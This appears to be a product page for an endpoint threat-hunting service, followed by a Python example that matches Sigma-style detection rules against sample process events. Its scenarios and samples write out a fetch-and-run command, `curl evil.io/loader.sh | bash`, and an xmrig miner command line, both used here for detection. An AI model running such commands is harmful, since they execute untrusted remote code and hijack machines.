Hunt across the entire fleet.
38 Sigma rules, MITRE ATT&CK mapping, cross-tenant threat intel fabric, 21 automated remediation playbooks. Detection in milliseconds.
What you get.
38 Sigma rules built-in
Cred dump, reverse shell, backup wipe, cryptominer, persistence, lateral movement, exfiltration — all covered, all updated weekly.
MITRE ATT&CK mapping
Every detection maps to a MITRE ATT&CK technique. Filter by tactic. Report in the language your SOC already speaks.
Cross-tenant intel fabric
When one tenant detects a new IOC, all tenants benefit. 12 free intel feeds bundled out-of-the-box (URLhaus, Feodo, MalwareBazaar, etc.).
21 automated playbooks
Kill process · quarantine file · isolate device · rotate credential · push DNS block · snapshot filesystem — all fire automatically based on detection severity.
12 ATT&CK tactics.
Real scenarios.
An employee runs `curl evil.io/loader.sh | bash`
SM-SIGMA-0118 reverse-shell signature fires within 200ms. Process killed, parent process logged, device flagged for review.
A device starts mining crypto silently
SM-SIGMA-0129 catches xmrig in the process command line. Process terminated, malware family identified, host network-isolated until the investigation completes.
Mimikatz launched on a workstation
SM-SIGMA-0102 + memory-pattern detection both fire. Credential rotation auto-triggered for all sessions, full playbook executed.
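The command-line matches in the scenarios above, as an added example that is not the product's own rules or engine: a minimal evaluator for Sigma-style `contains` / `contains|all` selections, run over constructed process-creation events. The rule titles, ATT&CK tags, field names and sample events are assumptions made for illustration.

```python
from typing import Any, Dict, List

# Constructed Sigma-style rules (assumption: not the vendor's rule set). Each rule
# carries MITRE ATT&CK tags and a selection over process-creation fields, using
# Sigma's modifiers: `contains` (any listed value) and `contains|all` (every value).
RULES: List[Dict[str, Any]] = [
    {
        "title": "Remote script piped into a shell",
        "tags": ["attack.execution", "attack.t1059.004"],   # Unix Shell
        "selection": {"CommandLine|contains|all": ["curl ", "| bash"]},
        "level": "high",
    },
    {
        "title": "XMRig miner launched",
        "tags": ["attack.impact", "attack.t1496"],          # Resource Hijacking
        "selection": {"CommandLine|contains": ["xmrig"]},
        "level": "medium",
    },
]


def _match_field(event: Dict[str, Any], key: str, values: List[str]) -> bool:
    """Evaluate one `Field|modifier...` clause; Sigma string matching is case-insensitive."""
    field, *mods = key.split("|")
    actual = str(event.get(field, "")).lower()
    needles = [str(v).lower() for v in values]
    ops = {
        "contains": lambda n: n in actual,
        "startswith": actual.startswith,
        "endswith": actual.endswith,
    }
    test = next((ops[m] for m in mods if m in ops), lambda n: actual == n)
    return all(map(test, needles)) if "all" in mods else any(map(test, needles))


def evaluate(event: Dict[str, Any], rules: List[Dict[str, Any]] = RULES) -> List[Dict[str, str]]:
    """Return {title, technique, level} for every rule whose whole selection matches the event."""
    hits = []
    for rule in rules:
        if all(_match_field(event, k, v) for k, v in rule["selection"].items()):
            technique = next((t for t in rule["tags"] if t.startswith("attack.t")), "")
            hits.append({"title": rule["title"], "technique": technique, "level": rule["level"]})
    return hits


# Constructed process-creation events in the shape of Sysmon/auditd-style telemetry.
EVENTS = [
    {"Image": "/usr/bin/bash", "CommandLine": "bash -c 'curl evil.io/loader.sh | bash'"},
    {"Image": "/tmp/.cache/xmrig", "CommandLine": "xmrig -o pool.invalid:3333 --donate-level 0"},
    {"Image": "/usr/bin/curl", "CommandLine": "curl https://example.com/index.html -o index.html"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["CommandLine"], "->", [h["title"] for h in evaluate(ev)])
```

The third event shows why the `all` modifier matters: a plain download with no pipe into a shell does not trip the first rule.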